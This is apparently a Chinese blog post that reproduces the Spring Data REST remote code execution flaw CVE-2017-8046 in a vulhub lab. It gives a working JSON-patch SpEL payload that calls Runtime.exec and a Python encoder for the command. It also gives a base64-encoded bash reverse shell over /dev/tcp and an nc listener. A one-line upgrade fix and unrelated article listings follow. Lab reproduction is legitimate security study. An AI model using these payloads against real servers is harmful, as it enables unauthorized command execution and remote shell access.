CVE-2017-8046-Spring Data Rest RCE 漏洞复现

最新推荐文章于 2024-05-31 19:04:00 发布
最新推荐文章于 2024-05-31 19:04:00 发布
阅读量1.1k 收藏
点赞数
分类专栏: 漏洞 文章标签: 安全 web安全 框架
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58596609/article/details/124339729
版权

0x00 前言

近期会一直出spring框架的漏洞

--学如逆水行舟,不进则退

0x01 漏洞简介

Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。

漏洞解析:

Spring Data Rest服务器PATCH请求远程代码执行漏洞CVE-2017-8046补充分析 | xxlegend

0x02 影响范围

        受影响的版本

  • Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3
  • Spring Boot version < 2.0.0M4
  • Spring Data release trains < Kay-RC3

        不受影响的版本

  • Spring Data REST 2.5.12, 2.6.7, 3.0RC3
  • Spring Boot 2.0.0.M4
  • Spring Data release train Kay-RC3

0x03 漏洞复现

环境搭建这里使用vulhub靶场环境

搭建成功之后,访问靶场,出现以下页面说明搭建成功

 漏洞验证之前,我们需要将要执行的命令进行Ascii转译,不然会执行不成功的   不会的看漏洞简介中的漏洞解析

这里进行Ascii转换的使用python脚本

payload变量单引号中就是我们要执行的命令,根据自己的需求修改即可

payload = b'touch /tmp/maskedman'
bytecode = ','.join(str(i) for i in list(payload))
print(bytecode)

 运行转换之后,访问http://靶场ip:8080/customers/1进行抓包

此处要注意::: 1. 抓包之后get方式修改为PATCH

2.添加字段:Content-Type: application/json-patch+json

3.漏洞利用的payload为(new byte 后面的{}括号中的数字就是执行的命令转换后的Ascii码)

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[{116,111,117,99,104,32,47,116,109,112,47,109,97,115,107,101,100,109,97,110}))/lastname", "value": "vulhub" }]

 抓包之后进行重放,完成图如下:

发送成功之后,现在进去docker容器看一下,文件是否创建成功

进去docker容器命令为:

docker exec -it 容器ID /bin/bash 

进入容器之后,发现文件创建成功,说明命令执行成功,如下图

  开始尝试反弹shell

反弹shell之前的准备步骤:

1.对反弹shell的命令进行base64编码

2.使用python脚本对base64编码后的命令进行转码

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80My4ASDADjYuNjUvMTEyMiAwPiYx}|{base64,-d}|{bash,-i}

 

 编码转码之后,在http://靶场ip:8080/customers/1页面处进行抓包

修改的注意点和上面是一样的,只需要将转码后的数字改为反弹shell的即可

nc监听

nc -lvvp 1122

 发送数据包反弹shell

 0x04 修复建议

官方已经发布新版本修复了该漏洞,受影响的用户可升级至最新版本来防护该漏洞。

参考文献:Spring Data Rest服务器PATCH请求远程代码执行漏洞技术分析与防护方案 – 绿盟科技技术博客 (nsfocus.net)

 

 

种树人1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
主要介绍了浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤),小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
Spring Data REST 远程代码执行漏洞CVE-2017-8046)分析与复现
一个有情怀的程序猿博客
06-30 1058
前言 2009年9月Spring 3.0 RC1发布后,Spring就引入了SpEL(Spring Expression Language)。对于开发者而言,引入新的工具显然是令人兴奋的,但是对于运维人员,也许是噩耗的开始。类比Struts 2框架,会发现绝大部分的安全漏洞都和ognl脱不了干系。尤其是远程命令执行漏洞,占据了多少甲方乙方工程师的夜晚/周末,这导致Struts 2越来越不受待见。 因此,我们有理由相信Spring引入SpEL必然增加安全风险。事实上,过去多个Spring CVE都与其..
spring远程命令执行漏洞复现CVE-2017-8046
最新发布
2301_82197189的博客
05-31 247
Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码
CVE-2017-8046 Spring Data Rest 远程命令执行漏洞复现(最详细版本)
精品博客,你值得一看~
09-17 667
REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码.先cd到spring目录下的CVE-2017-8046里面,然后使用docker-compose启动环境.一切都准备好之后就可以启动CVE-2017-8046 的环境了.
Spring data rest漏洞在IDEA中复现CVE-2017-8046
wxzyyds的博客
11-06 1217
这篇文章主要讲述了spring data restCVE-2017-8046)由于spel表达式没有进行过滤而导致的远程RCE,本片文章利用了IDEA中的动态调试,实现了对于漏洞产生原因的详细复现
Spring Data Rest远程命令执行漏洞复现CVE-2017-8046
wutiangui的博客
09-10 394
Spring Data Rest服务器在处理PATCH请求时存在一个远程代码执行漏洞。攻击者通过构造好的JSON数据来执行任意Java代码。将Content-Type指定为application/json-patch+json。使用python将准备执行代码编码为十进制。访问以下链接,出现如下界面说明存在漏洞。1.准备shell命令。修改方法改为PATCH。
Spring Data Rest-远程命令执行漏洞CVE-2017-8046
qq_43381463的博客
04-11 455
Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中,path的值被传入`setValue`,导致执行了SpEL表达式,触发远程命令执行漏洞
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
hikvision_CVE-2017-7921配置文件解密.rar
05-20
具体影响产品型号,请参考CVE-...CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名configurationFile
CVE-2017-8759-Exploit-sample-master
07-05
CVE-2017-8759-Exploit-sample-master,漏洞示例代码
CVE-2017-8046 复现与分析
weixin_30715523的博客
07-28 286
环境搭建 使用的项目为https://github.com/spring-guides/gs-accessing-data-rest.git里面的complete,直接用IDEA导入,并修改pom.xml中版本信息为漏洞版本。这里改为1.5.6。 之前尝试搭建了另一个验证环境,但是修改版本后加载一直报错,不知道是什么原因,写完在研究下。 直接运行,默认端口8080,访问http://lo...
spring-data-rest-rec 复现分析 cve-2017-8046
whatday的专栏
07-06 512
漏洞信息 pivotal发布的漏洞信息如下: Malicious PATCH requests submitted to servers using Spring Data REST backed HTTP resources can use specially crafted JSON data to run arbitrary Java code. 简而言之,就是Spring Data REST对PATCH方法处理不当,导致攻击者能够利用JSON数据造成RCE。本质还是因为spring的SPE
Spring Data Rest 远程命令执行漏洞CVE-2017-8046
黑白的博客
12-20 1209
声明 好好学习,天天向上 漏洞描述 Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。 影响范围 pivotal Spring Data REST < 2.5.12 2.6.7 3.0 RC3 pivotal Spring Boot < 2.0.0M4 pivotal Sprin
Spring框架漏洞总结
weixin_31351409的博客
02-21 2570
点击上方“小强的进阶之路”,选择“星标”公众号优质文章,及时送达预计阅读时间: 20分钟Spring简介Spring是Java EE编程领域的一个轻量级开源框架,该框架由一个叫Rod Jo...
GoAhead Web服务器远程命令执行漏洞CVE-2017-17562)漏洞复现
Amdy_amdy的博客
09-26 3405
一、漏洞概述: 1、漏洞简介: GoAhead Web Server,它是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行的嵌入式Web Server。 GoAhead Web Server是跨平台的服务器软件,可以稳定地运行在Windows,Linux和Mac OS X操作系统之上。GoAhead Web Server是开放源代码的,这意味着你可以随意修改Web服务器的功能。...
MSF之CVE-2017-8464远程命令执行漏洞复现
极光时流
12-02 3278
MSF之CVE-2017-8464远程命令执行漏洞复现准备扫描漏洞 准备 实验准备环境: 被攻击机:虚拟机win2008x64位系统,其IP为:192.168.1.107 攻击机:虚拟机kali系统,其IP为:192.168.1.111 攻击工具:kali自带的msfconsole工具 扫描漏洞 在kali终端中输入msfconsole cd 下载/ msfvenom -p windows...
Spring Data Rest 远程命令执行漏洞复现CVE-2017-8046
来到了学渣的博客
11-09 382
环境搭建好后直接访问,漏洞页面如下 看到有/customers和/profile路径 访问请求会发现响应包有json传值 访问/customers和/profile路径 访问json请求中给的路径 构造poc http://www.jackson-t.ca/runtime-exec-payloads.html 先对想要执行的命令进行编码然后转ascii码 转ascii直接写了个小脚本 ch=str(input("请输入一串字符:")) a=[] for i in ch: print(i,"
cve-2017-7504漏洞复现
08-23
您好!对于CVE-2017-7504漏洞复现,请注意以下几个步骤: 1. 确认受影响的软件版本:CVE-2017-7504是一个Apache Struts 2框架中的远程代码执行漏洞。在复现之前,请确保目标系统运行的是受影响的Apache Struts 2版本。 2. 搭建相应的环境:您可以在漏洞复现环境中使用Apache Struts 2漏洞测试框架,例如Metasploit或其他可用的漏洞测试工具。 3. 指定目标URL:使用合适的工具,指定目标URL以进行漏洞利用。通常,您需要提供目标系统上受影响的Struts 2应用程序的URL。 4. 发起攻击:使用漏洞利用工具执行相应的攻击代码。具体的攻击方法取决于您使用的工具和漏洞利用脚本。 请注意,漏洞复现属于未经授权的活动,可能违反法律法规,因此我们强烈建议仅在合法授权和合规测试范围内进行漏洞复现。此外,对于未经授权或非法目的使用该漏洞进行攻击是违法行为,且可能导致严重后果。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

种树人1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值